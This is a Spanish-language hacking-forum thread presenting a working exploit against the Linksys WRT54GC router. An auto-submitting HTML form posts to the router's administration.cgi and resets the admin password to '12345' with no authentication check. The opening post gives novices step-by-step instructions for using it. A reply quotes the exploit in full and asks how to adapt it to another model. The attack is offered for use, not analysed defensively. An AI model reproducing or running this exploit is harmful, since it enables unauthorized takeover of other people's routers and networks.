Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: RedKnight en 3 Mayo 2009, 19:58 PM

Título: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
Publicado por: RedKnight en 3 Mayo 2009, 19:58 PM
El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código [Seleccionar]
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
  document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info (http://www.securityfocus.com/bid/34616/info)


Título: Re: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
Publicado por: genomma en 26 Junio 2010, 10:28 AM
Cita de: RedKnight en  3 Mayo 2009, 19:58 PM
El router Linksys WRT54GC no comprueba la identidad del administrador al cambiar la contraseña de este, por lo tanto, es posible cambiarla a través de la siguiente consulta POST si tienes acceso a la red (por ejemplo, porque no está cifrada  :xD):

Código [Seleccionar]
<html><body>
<form method="POST" action="http://IP_ROUTER(por defecto 192.168.1.1)/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>


<!-- C?digo de envio autom?tico do formul?rio -->


<SCRIPT language="javascript">
 document.senha.submit();
</SCRIPT>


</body></html>

NOTA PARA LOS NEWBIES: para utilizar el código, debéis abrir el bloc de notas,
copiarlo, modificarlo y guardarlo con la extensión .html, y abrir el archivo resultante cuando estéis conectados al router vulnerable.

Para más información: http://www.securityfocus.com/bid/34616/info (http://www.securityfocus.com/bid/34616/info)




YO tengo un Linksys WRT54G seriviría este Script????   que modificaciones le tengo que hacer si mi direccion es 192.168.1.1????
Título: Re: ¡Cómo "hackear" un router Linksys WRT54GC no cifrado!
Publicado por: Debci en 26 Junio 2010, 10:35 AM
Como ya dice el compañero, es la que se usa por defecto, lee un poco el codigo que aunque no sepas programar se sobre-entiende, que es Html tio...

Saludos
Sólo texto | Texto con Imágenes